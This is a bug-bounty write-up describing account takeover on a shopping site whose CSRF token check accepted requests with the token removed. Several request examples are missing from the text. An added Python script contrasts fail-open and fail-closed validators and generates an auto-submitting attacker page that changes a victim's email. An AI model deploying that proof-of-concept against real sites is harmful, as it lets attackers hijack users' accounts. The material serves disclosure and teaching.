Account Takeover via CSRF Misconfiguration

What is CSRF?

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Case Study

As this was a private program, all illustrations of the vulnerability will be represented with the host as

Since this was a shopping site, I started by playing with the price parameter to get items for free, but failed. The program was two years old and already had around 100 reports, so I assumed the account section would not be vulnerable. Still, it was worth testing. Under my account page there is an option to change the email address without entering the password. That looked promising, because an email change that requires no re-authentication can end in account takeover via CSRF. But as soon as I intercepted the request, I saw that the POST request carried a CSRF token.

POST /customer/account/edit/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 262
Connection: close


So I started testing the CSRF protection. First I stripped the CSRF token's value, something like


That attempt ended in an error. The next step was to remove the CSRF_TOKEN parameter completely, which looked something like this


Again an error. After about 10 minutes of testing I noticed that CSRF_TOKEN was sent twice in the same request


So I removed both CSRF_TOKEN parameters; the POST request then looked like


And I was able to take over anyone's account. The server validated a CSRF token whenever one was supplied, but it did not reject a request that supplied none at all: the check failed open. A cross-site page that submits the token-less form on behalf of a logged-in victim can therefore change the victim's email address to one the attacker controls.
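To make the difference concrete, here is an added example (written for this page, not code from the target site) that models the fail-open check described above next to a fail-closed one, builds the form bodies for the steps in the write-up, and generates the attacker-hosted page that replays the token-less request. The parameter name CSRF_TOKEN and the path /customer/account/edit/ come from the write-up; the session token value, the other form fields, the host target.example and the validator internals are assumptions. The real site's exact logic is unknown, so the vulnerable validator is the simplest one consistent with the final outcome; it is not a claim about how the intermediate attempts were handled.

```python
"""Fail-open vs fail-closed CSRF token checks for a form-encoded POST.

Added illustration, not code from the target site. CSRF_TOKEN and
/customer/account/edit/ come from the write-up; the session token value,
the extra form fields, the host and the validator design are assumptions.
"""
import hmac
import html
from typing import List, Optional
from urllib.parse import parse_qs, parse_qsl, urlencode

# Constructed per-session token standing in for whatever the real site issued.
SESSION_TOKEN = "c1f4e2a9b7d3054e8f6a1b2c3d4e5f60"


def build_request_body(new_email: str, tokens: Optional[List[str]]) -> str:
    """Constructed stand-in for the body of POST /customer/account/edit/.

    `tokens` lists the CSRF_TOKEN values to include, in order; None or an
    empty list produces the token-less body used in the final attack.
    """
    fields = [("firstname", "Victim"), ("lastname", "User"), ("email", new_email)]
    fields.extend(("CSRF_TOKEN", t) for t in tokens or [])
    return urlencode(fields)


def _tokens_in(body: str) -> Optional[List[str]]:
    """Every CSRF_TOKEN value in the body, or None when the parameter is absent."""
    return parse_qs(body, keep_blank_values=True).get("CSRF_TOKEN")


def validate_fail_open(body: str, session_token: str) -> bool:
    """Vulnerable pattern: only compare a token when the client sent one.

    A blank or wrong token is rejected, but a body with no CSRF_TOKEN at all
    skips the comparison entirely and is accepted.
    """
    tokens = _tokens_in(body)
    if tokens is None:
        return True  # nothing to compare, so the check is skipped: fail open
    return all(hmac.compare_digest(t.encode(), session_token.encode()) for t in tokens)


def validate_fail_closed(body: str, session_token: str) -> bool:
    """Hardened pattern: reject unless a token is present and every copy of it
    matches the session-bound value (constant-time comparison)."""
    tokens = _tokens_in(body)
    if not tokens:
        return False  # an absent parameter is a failure, not a pass
    return all(
        t != "" and hmac.compare_digest(t.encode(), session_token.encode())
        for t in tokens
    )


def csrf_poc_html(action_url: str, body: str) -> str:
    """Attacker-hosted page that replays `body` as a cross-site form POST.

    A plain HTML form reproduces the application/x-www-form-urlencoded body
    but cannot add the X-Requested-With header the site's own JavaScript
    sent; the attack succeeding implies the server did not require it.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in parse_qsl(body, keep_blank_values=True)
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{html.escape(action_url, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n</body></html>"
    )


if __name__ == "__main__":
    action = "https://target.example/customer/account/edit/"  # assumed host
    for label, tokens in [
        ("two valid copies (original request)", [SESSION_TOKEN, SESSION_TOKEN]),
        ("token value blanked", [""]),
        ("every copy removed", None),
    ]:
        body = build_request_body("attacker@example.com", tokens)
        print(f"{label:38} fail-open={validate_fail_open(body, SESSION_TOKEN)!s:5} "
              f"fail-closed={validate_fail_closed(body, SESSION_TOKEN)}")
    print(csrf_poc_html(action, build_request_body("attacker@example.com", None)))
```

The practitioner's check is the last scenario: a validator that only runs when the parameter exists passes the token-less body, while the fail-closed version rejects it. When reviewing a CSRF implementation, always send the request with the token parameter deleted (every copy of it), not just with a blank or wrong value.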

Reported: 12 March 2020
Responded: 15 March 2020
Rewarded: $XXX, 24 April 2020
